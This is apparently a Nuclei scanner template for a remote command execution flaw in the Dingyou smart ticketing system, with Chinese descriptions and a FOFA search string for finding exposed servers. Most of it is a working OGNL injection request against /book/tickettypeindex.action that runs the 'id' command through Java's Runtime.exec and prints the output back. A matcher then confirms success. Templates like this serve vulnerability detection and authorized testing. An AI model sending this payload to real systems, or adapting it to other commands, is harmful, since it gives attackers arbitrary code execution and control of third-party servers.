id: DingYouXinXi-ZhiHuiPiaoWu-tickettypeindex_action-RCE

info:
  name: 鼎游信息智慧票务系统 tickettypeindex.action 远程命令执行
  author: HuanXiong
  severity: critical
  description: |-
    fofa: body="/book/showgoodsIndex.action"
    鼎游信息智慧票务系统 /book/tickettypeindex.action 接口存在远程命令执行漏洞，攻击者可通过构造恶意的请求，利用该漏洞在目标服务器上执行任意命令，从而可能导致服务器被完全控制、敏感数据泄露等严重后果。
  reference:
    - 
  tags: rce, dingyou

http:
  - raw:
      - |-
        GET /book/tickettypeindex.action?redirect:%24{%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char[5000]%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36

    matchers:
      - type: dsl
        name: RCE
        dsl:
          - "status_code == 200 && contains_all(body, 'uid=', 'gid=', 'groups=')"